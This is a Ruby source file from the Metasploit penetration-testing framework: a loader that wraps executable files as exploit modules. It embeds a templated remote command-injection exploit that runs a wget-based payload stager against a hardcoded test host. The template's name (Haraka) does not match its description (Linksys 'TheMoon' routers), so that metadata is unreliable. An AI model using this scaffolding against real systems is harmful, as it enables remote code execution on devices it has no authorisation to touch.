Adam Cammack
71df231918
Still some kluges left in the shim and we have to hit the disk when constructing the module path
166 lines
5.5 KiB
Ruby
166 lines
5.5 KiB
Ruby
# -*- coding: binary -*-
|
|
|
|
require 'msf/core/modules/loader'
|
|
require 'msf/core/modules/loader/base'
|
|
|
|
# Concerns loading executables from a directory as modules
|
|
class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
|
|
# Returns true if the path is a directory
|
|
#
|
|
# @param (see Msf::Modules::Loader::Base#loadable?)
|
|
# @return [true] if path is a directory
|
|
# @return [false] otherwise
|
|
def loadable?(path)
|
|
if File.directory?(path)
|
|
true
|
|
else
|
|
false
|
|
end
|
|
end
|
|
|
|
protected
|
|
|
|
# Yields the module_reference_name for each module file found under the directory path.
|
|
#
|
|
# @param [String] path The path to the directory.
|
|
# @param [Hash] opts Input Hash.
|
|
# @yield (see Msf::Modules::Loader::Base#each_module_reference_name)
|
|
# @yieldparam [String] path The path to the directory.
|
|
# @yieldparam [String] type The type correlated with the directory under path.
|
|
# @yieldparam module_reference_name (see Msf::Modules::Loader::Base#each_module_reference_name)
|
|
# @return (see Msf::Modules::Loader::Base#each_module_reference_name)
|
|
def each_module_reference_name(path, opts={})
|
|
whitelist = opts[:whitelist] || []
|
|
::Dir.foreach(path) do |entry|
|
|
full_entry_path = ::File.join(path, entry)
|
|
type = entry.singularize
|
|
|
|
unless ::File.directory?(full_entry_path) and
|
|
module_manager.type_enabled? type
|
|
next
|
|
end
|
|
|
|
full_entry_pathname = Pathname.new(full_entry_path)
|
|
|
|
# Try to load modules from all the files in the supplied path
|
|
Rex::Find.find(full_entry_path) do |entry_descendant_path|
|
|
if File.executable?(entry_descendant_path) && !File.directory?(entry_descendant_path)
|
|
entry_descendant_pathname = Pathname.new(entry_descendant_path)
|
|
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
|
|
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
|
|
|
|
# The module_reference_name doesn't have a file extension
|
|
module_reference_name = File.join(File.dirname(relative_entry_descendant_path), File.basename(relative_entry_descendant_path, '.*'))
|
|
|
|
yield path, type, module_reference_name
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
# Returns the full path to the module file on disk.
|
|
#
|
|
# @param (see Msf::Modules::Loader::Base#module_path)
|
|
# @return [String] Path to module file on disk.
|
|
def module_path(parent_path, type, module_reference_name)
|
|
# The extension is lost on loading, hit the disk to recover :(
|
|
partial_path = File.join(DIRECTORY_BY_TYPE[type], module_reference_name)
|
|
full_path = File.join(parent_path, partial_path)
|
|
|
|
Rex::Find.find(File.dirname(full_path)) do |mod|
|
|
if File.basename(full_path, '.*') == File.basename(mod, '.*')
|
|
return File.join(File.dirname(full_path), File.basename(mod))
|
|
end
|
|
end
|
|
|
|
''
|
|
end
|
|
|
|
# Loads the module content from the on disk file.
|
|
#
|
|
# @param (see Msf::Modules::Loader::Base#read_module_content)
|
|
# @return (see Msf::Modules::Loader::Base#read_module_content)
|
|
def read_module_content(parent_path, type, module_reference_name)
|
|
full_path = module_path(parent_path, type, module_reference_name)
|
|
unless File.executable?(full_path)
|
|
load_error(full_path, Errno::ENOENT.new)
|
|
return ''
|
|
end
|
|
%Q|
|
|
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::CmdStager
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Haraka Remote Command Injection',
|
|
'Description' => %q{
|
|
Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
|
|
injection. This vulnerability was used from the so-called "TheMoon" worm. There
|
|
are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,
|
|
E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested
|
|
successfully against an E1500 v1.0.5.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Johannes Ullrich', #worm discovery
|
|
'Rew', # original exploit
|
|
'infodox', # another exploit
|
|
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
|
|
'juan vazquez' # minor help with msf module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'EDB', '31683' ],
|
|
[ 'BID', '65585' ],
|
|
[ 'OSVDB', '103321' ],
|
|
[ 'PACKETSTORM', '125253' ],
|
|
[ 'PACKETSTORM', '125252' ],
|
|
[ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],
|
|
[ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
|
|
],
|
|
'DisclosureDate' => 'Feb 13 2014',
|
|
'Privileged' => true,
|
|
'Platform' => %w{ linux unix },
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Linux x64 Payload',
|
|
{
|
|
'Arch' => ARCH_X64,
|
|
'Platform' => 'linux'
|
|
}
|
|
]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DefaultOptions' => { 'WfsDelay' => 5 }
|
|
))
|
|
end
|
|
|
|
def execute_command(cmd, opts)
|
|
to = 'admin@arnold'
|
|
rhost = '192.168.244.130'
|
|
`#{module_path(parent_path, type, module_reference_name)} -c "\#{cmd}" -t \#{to} -m \#{rhost}`
|
|
true
|
|
end
|
|
|
|
def exploit
|
|
print_status("Trying to access the vulnerable URL...")
|
|
|
|
print_status("Exploiting...")
|
|
execute_cmdstager({:flavor => :wget})
|
|
end
|
|
|
|
|
|
end
|
|
|
|
|
end
|
|
end
|